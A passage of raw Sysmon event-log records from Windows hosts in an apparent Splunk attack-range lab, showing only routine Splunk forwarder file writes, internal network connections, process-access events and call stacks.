Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72EE88D4E357C911A24B42F02AEBFF13,SHA256=947BED8B6FCD17F85B17FA1D5E80D5A4046BD1789EC219243256D5B902E37F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:39.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C44D25F9D5D4A6EBC3CC8E26643798AE,SHA256=8AFCA1D9FA8CD5AE025B714D2E75AFD7E0F9FE20DA7A33D4A1577E70AC00D401,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:38.872{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53213-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000284930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:40.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF131A8B7A523A5D1AFAD91F24B31FB5,SHA256=CC9A0FD76CC1E47A27FE132997740DCE9D92062807458197848A99BF62D7B7B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:40.169{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD2B1A14028EEDB27FA8A403FB68B0A5,SHA256=4C921E900448828896942D94F7A015862BC963A8929F4264ED4DE03445517AFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:41.301{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=452666CCFD5EE801083EC395C90FD3B5,SHA256=2D17A7C854D3940DDF4915C3BF2CD24F1BE996699EFABE5B348DE61A13764143,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:39.608{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51161-false10.0.1.12-8000- 23542300x8000000000000000213985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:41.185{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E37872CA7D3C8F7D59F6C84E5833D5,SHA256=C6807A317644B294F00025625B0CFE12BE1889CF4C2549AB39D5C3536EF89FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:42.200{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63491FA194FB745E80A390AA2D9E9217,SHA256=01E05BA98F5680229447CE1E493E760C0F03466AAE91EE9C3CC0A9953C34C5A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:42.301{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF34E32438F8ADF98C9E43AC6D3928E9,SHA256=F4BB5E996DBCB6862A1B1620428F058487337DDAFEC826A1E5B8A0E96A0438AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:43.332{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BAB60439BE93F22EEC3A18C088B2EB9,SHA256=993CC715C167ADF44ED226A66B157200E35C8D3C8613DC9B894D1CDFC91E8B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:43.200{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45ED2D78E68538ECAC5BA3B3843558C6,SHA256=25E59FB90DCA6F73897C1F80F366E1C33595102D4282A74A1D7ECF03626010E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:44.348{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FADD0E1906A368D0E54284E951E8903,SHA256=E441D2C45BFC35B97A0812B72D2CEFFD4865F4656DD954DC99C7787C61205794,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:44.216{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B688D94D0B4A7B08CF17E5AFAEF2FC5,SHA256=BE8BE9467E9063E84F8FE02CE24F37C36518057CBA1BFFF65D1E31883B40D544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:45.363{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D07949A60E5B79B4BEF4D50EC81C52,SHA256=D561ADD58E267152555218B573AC886FC113B4AC5E44AAC36615CD53A21E909D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E01-6216-EF03-000000003902}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E01-6216-EF03-000000003902}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E01-6216-EF03-000000003902}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.810{4F8D34B0-0E01-6216-EF03-000000003902}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.653{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.357{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BFF6D9EFF174A136273E3641FF67ED4,SHA256=DC1180621D6944615B218CD30345E456034230FD570E8140702E4137C758DFC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:41.559{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53214-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000214003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.325{4F8D34B0-0E01-6216-EE03-000000003902}5203928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E01-6216-EE03-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:45.138{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 